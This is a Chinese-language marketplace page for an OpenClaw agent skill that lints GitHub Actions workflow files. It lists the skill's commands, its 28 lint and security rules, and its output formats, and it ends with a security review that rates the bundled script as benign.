← 返回 Skills 市场

Github Actions Linter

Name: Github Actions Linter
Author: charlie-morrison

作者 charlie-morrison · GitHub ↗ · v1.0.0 · MIT-0

cross-platform ✓ 安全检测通过

总下载

当前安装

版本数

在 OpenClaw 中安装

/install github-actions-linter

功能描述

Lint and validate GitHub Actions workflow YAML files for common mistakes, security issues, deprecated actions, and best practices. Use when asked to lint, va...

使用说明 (SKILL.md)

GitHub Actions Linter

Lint GitHub Actions workflow files for syntax errors, security issues, deprecated actions, and best practices violations.

Commands

All commands use the bundled Python script at scripts/gha_linter.py.

1. Lint a workflow file

python3 scripts/gha_linter.py lint \x3Cfile-or-directory> [--strict] [--format text|json|markdown]

Runs all lint rules against one or more workflow files. If given a directory, scans for *.yml and *.yaml files recursively.

Flags:

--strict — exit code 1 on any warning (not just errors)
--format — output format: text (default), json, markdown

2. Audit for security issues

python3 scripts/gha_linter.py security \x3Cfile> [--format text|json|markdown]

Focused security audit: shell injection via ${{ }} in run:, hardcoded secrets, overly permissive permissions, untrusted event contexts in expressions.

3. Check for deprecated actions

python3 scripts/gha_linter.py deprecated \x3Cfile> [--format text|json|markdown]

Detect outdated action versions (e.g., actions/checkout@v2, actions/setup-node@v3 when v4 exists) and suggest upgrades.

4. Validate workflow structure

python3 scripts/gha_linter.py validate \x3Cfile> [--format text|json|markdown]

Structural validation only: required keys (on, jobs), valid trigger events, valid runs-on labels, job dependency graph (circular deps, missing refs).

Lint Rules (28 total)

Syntax & Structure (8 rules)

missing-on — Workflow missing on trigger
missing-jobs — Workflow missing jobs section
empty-jobs — Jobs section is empty
missing-runs-on — Job missing runs-on
missing-steps — Job missing steps
empty-steps — Steps list is empty
invalid-trigger — Unknown trigger event name
circular-deps — Circular job dependency via needs

Security (8 rules)

shell-injection — ${{ }} expression in run: (potential injection)
hardcoded-secret — Hardcoded password/token/key patterns in workflow
permissive-permissions — permissions: write-all or no permissions block
untrusted-context — Dangerous contexts in expressions (github.event.issue.title, github.event.pull_request.body, etc.)
pull-request-target — pull_request_target with checkout of PR head (known attack vector)
third-party-action — Non-verified third party action without pinned SHA
env-in-run — Secret used directly in run: instead of via env:
excessive-permissions — Job requests more permissions than needed

Deprecated & Outdated (4 rules)

deprecated-action — Action version is outdated (v1/v2 when v4 exists)
deprecated-runner — Using deprecated runner labels (ubuntu-18.04, macos-10.15)
set-output-deprecated — Using deprecated ::set-output:: command
save-state-deprecated — Using deprecated ::save-state:: command

Best Practices (8 rules)

missing-timeout — Job without timeout-minutes (default 6h is dangerous)
missing-name — Step without name (harder to debug)
latest-tag — Action pinned to @main or @master (unstable)
no-concurrency — Workflow without concurrency (can waste resources)
hardcoded-runner — Hardcoded runner version instead of -latest
long-run-command — run: block exceeds 50 lines (should be a script)
duplicate-step-id — Duplicate id in steps within same job
missing-if-continue — continue-on-error: true without explanation comment

Output Formats

Text (default)

workflow.yml:12:3 error [shell-injection] Expression ${{ github.event.issue.title }} in run: is vulnerable to injection
workflow.yml:25:5 warning [missing-timeout] Job 'build' has no timeout-minutes (default: 360 min)
workflow.yml:31:7 warning [missing-name] Step at index 2 has no name

3 issues (1 error, 2 warnings)

JSON

{
  "file": "workflow.yml",
  "issues": [...],
  "summary": {"errors": 1, "warnings": 2, "info": 0}
}

Markdown

Summary table with severity, rule, location, and message.

CI Integration

# .github/workflows/lint-actions.yml
name: Lint Workflows
on: [push, pull_request]
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python3 scripts/gha_linter.py lint .github/workflows/ --strict

Exit codes: 0 = clean, 1 = errors found (or warnings in --strict mode).

安全使用建议

This skill appears to be a straightforward, bundled Python linter for GitHub Actions workflows. Before installing or running it: (1) inspect the full script (scripts/gha_linter.py) yourself — running arbitrary code has risk even if it looks benign; (2) run it on a local or sandboxed copy of your repository if you have sensitive workflows or secrets (the tool will read any files you point it at); (3) expect some false positives/negatives because it uses a custom minimal YAML parser; (4) no credentials are required, so avoid granting tokens or secrets to the skill. If you want extra assurance, run the script in an isolated environment (container) and review its full source for any network or shell operations before use.

功能分析

Type: OpenClaw Skill Name: github-actions-linter Version: 1.0.0 The skill bundle provides a legitimate utility for linting and auditing GitHub Actions workflow files. The core logic in `scripts/gha_linter.py` implements standard security checks (such as shell injection detection, hardcoded secret scanning, and SHA pinning) and best-practice validations using only the Python standard library. There is no evidence of data exfiltration, unauthorized network access, or malicious prompt injection within the instructions or code.

能力评估

✓ Purpose & Capability

Name/description (GitHub Actions linter) match the delivered artifacts: runtime instructions call the bundled Python script and the repository contains a linter implementation. There are no unrelated required binaries or credentials.

ℹ Instruction Scope

SKILL.md instructs the agent to run the included script (python3 scripts/gha_linter.py) against one or more files or directories and provides modes (lint, security, deprecated, validate). This necessarily reads workflow files (e.g., .github/workflows/*.yml) and can be pointed at arbitrary paths — expected for a linter, but users should be aware it will parse any files/dirs you ask it to analyze.

✓ Install Mechanism

No install spec or external downloads. The linter is bundled as a local Python script and claims to rely only on stdlib; nothing is pulled from external URLs or package registries.

✓ Credentials

The skill declares no required environment variables or credentials. SKILL.md and the visible code do not reference secret or external credentials. Requesting no tokens is proportional to a static linter.

✓ Persistence & Privilege

always is false and the skill does not request elevated or persistent presence. There are no instructions to modify other skills or global agent configuration.

如何使用

确保已安装 OpenClaw（本地或 Docker 部署）
在对话框中输入安装命令：/install github-actions-linter
安装完成后，直接呼叫该 Skill 的名称或使用 /github-actions-linter 触发
根据 Skill 的参数说明提供必要输入，即可获得结构化输出

版本历史

v1.0.0

Initial release

元数据

Slug github-actions-linter

版本 1.0.0

许可证 MIT-0

累计安装 0

当前安装数 0

历史版本数 1

常见问题